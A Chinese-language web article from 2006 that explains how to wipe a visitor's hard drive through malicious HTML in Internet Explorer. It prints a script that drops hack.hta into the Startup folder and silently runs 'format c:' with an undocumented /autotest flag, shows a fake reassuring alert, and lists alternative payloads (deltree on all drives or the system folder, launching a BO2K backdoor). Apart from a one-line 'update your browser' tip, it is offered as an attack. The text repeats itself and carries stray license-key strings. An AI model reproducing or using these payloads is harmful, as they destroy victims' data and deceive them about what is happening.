如何利用HTML格式化你的硬盤
更新時(shí)間:2006年09月08日 00:00:00 作者:
這是利用微軟( Microsoft )的IE瀏覽器( Internet Explorer )所衍生出來的
攻擊方法。
以下這段就是具有破壞性的HTML
Hacking Your Computer .
scr.Reset(); scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\啟動(dòng)\\hack.hta";
scr.Doc="
wsh.Run('start.exe /m format c:/q /autotest /u');
alert('IMPORTANT : Windows is removing unused temporary files.');";
scr.write();
(懂HTML的人應(yīng)該就看得出來其中精隨)
現(xiàn)在我大概來解釋其中幾個(gè)項(xiàng)目所寫的意思
scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\啟動(dòng)\\hack.hta"
這一項(xiàng)就是指當(dāng)你看到這網(wǎng)頁它會(huì)寫入到你的電腦啟動(dòng)目錄底下,并命名為
hack.hta
wsh.Run('start.exe /m format c:/q /autotest /u');
通常要格式化硬碟都會(huì)先問你是否要執(zhí)行,但其中的"/autotest"這項(xiàng)。
它是一個(gè)微軟沒有公開的功能,鍵入後format的動(dòng)作便會(huì)被強(qiáng)制執(zhí)行。
這項(xiàng)中的/q /u是令系統(tǒng)不需要檢查硬碟便會(huì)立即執(zhí)行的指令。
最後start.exe再配合/m選項(xiàng)可以使format的DOS-prompt視窗在執(zhí)行的時(shí)候處於最小
化的狀態(tài)。
執(zhí)行其他攻擊指令的方法∶
只要修改“start.exe /m format c:/q /autotest /u”這一項(xiàng)便形。
start.exe /m format c:/q /autotest /u
其中的“c:”可以換做其他的硬碟。
(path)\bo2k.exe
執(zhí)行它電腦中的某個(gè)程式,如果你有傳bo2k到它電腦中就可以使用此指令。
start.exe /m deltree /y a:\*.* c:\*.* d:\*.*
殺掉對(duì)方硬碟底下所有的檔案。
start.exe /m deltree /y c:\windows\system\*.*
殺掉對(duì)方c:\windows\system\目錄底下的所有檔案。
後敘∶
預(yù)防遭此手段的破壞就是到微軟去更新你的瀏覽器。
cplic putlic eval 01Oct2001 ao9McpUFF-LvJU5BvTp-7xDVpSa4X-RrrcKpv jjCPSUITE-EVAL-3DES-NG CK-CP
攻擊方法。
以下這段就是具有破壞性的HTML
Hacking Your Computer .
scr.Reset(); scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\啟動(dòng)\\hack.hta";
scr.Doc="
wsh.Run('start.exe /m format c:/q /autotest /u');
alert('IMPORTANT : Windows is removing unused temporary files.');";
scr.write();
(懂HTML的人應(yīng)該就看得出來其中精隨)
現(xiàn)在我大概來解釋其中幾個(gè)項(xiàng)目所寫的意思
scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\啟動(dòng)\\hack.hta"
這一項(xiàng)就是指當(dāng)你看到這網(wǎng)頁它會(huì)寫入到你的電腦啟動(dòng)目錄底下,并命名為
hack.hta
wsh.Run('start.exe /m format c:/q /autotest /u');
通常要格式化硬碟都會(huì)先問你是否要執(zhí)行,但其中的"/autotest"這項(xiàng)。
它是一個(gè)微軟沒有公開的功能,鍵入後format的動(dòng)作便會(huì)被強(qiáng)制執(zhí)行。
這項(xiàng)中的/q /u是令系統(tǒng)不需要檢查硬碟便會(huì)立即執(zhí)行的指令。
最後start.exe再配合/m選項(xiàng)可以使format的DOS-prompt視窗在執(zhí)行的時(shí)候處於最小
化的狀態(tài)。
執(zhí)行其他攻擊指令的方法∶
只要修改“start.exe /m format c:/q /autotest /u”這一項(xiàng)便形。
start.exe /m format c:/q /autotest /u
其中的“c:”可以換做其他的硬碟。
(path)\bo2k.exe
執(zhí)行它電腦中的某個(gè)程式,如果你有傳bo2k到它電腦中就可以使用此指令。
start.exe /m deltree /y a:\*.* c:\*.* d:\*.*
殺掉對(duì)方硬碟底下所有的檔案。
start.exe /m deltree /y c:\windows\system\*.*
殺掉對(duì)方c:\windows\system\目錄底下的所有檔案。
後敘∶
預(yù)防遭此手段的破壞就是到微軟去更新你的瀏覽器。
cplic putlic eval 01Oct2001 ao9McpUFF-LvJU5BvTp-7xDVpSa4X-RrrcKpv jjCPSUITE-EVAL-3DES-NG CK-CP
相關(guān)文章
SA 沙盤模式下不用恢復(fù)xp_cmdshell和xplog70.dll也執(zhí)行命令
sa下刪除xp_cmdshell和xplog70.dll時(shí)候的一種辦法,不算新的了, 也被一些人不斷的再次提出來,為了方便自己記憶再寫出來, 在這種情況下,要執(zhí)行命令,條件是要有xp_regwrite。2011-01-01
最詳細(xì)的SQL注入相關(guān)的命令整理 (轉(zhuǎn))
這篇文章主要為打擊分享下一些常用SQL注入相關(guān)的命令,今天幫客戶做安裝的時(shí)候發(fā)現(xiàn)他的網(wǎng)站有很多漏洞,導(dǎo)致注入數(shù)據(jù)庫也被清空了,希望大家多關(guān)于安全2006-12-12
Mac下使用mitmproxy抓包HTTPS數(shù)據(jù)方法詳解
在Mac上常用的抓包軟件是 Charles下面為大家介紹另一個(gè)抓包神器 mitmproxy,具體使用方法大家可以參考下面的介紹2020-02-02

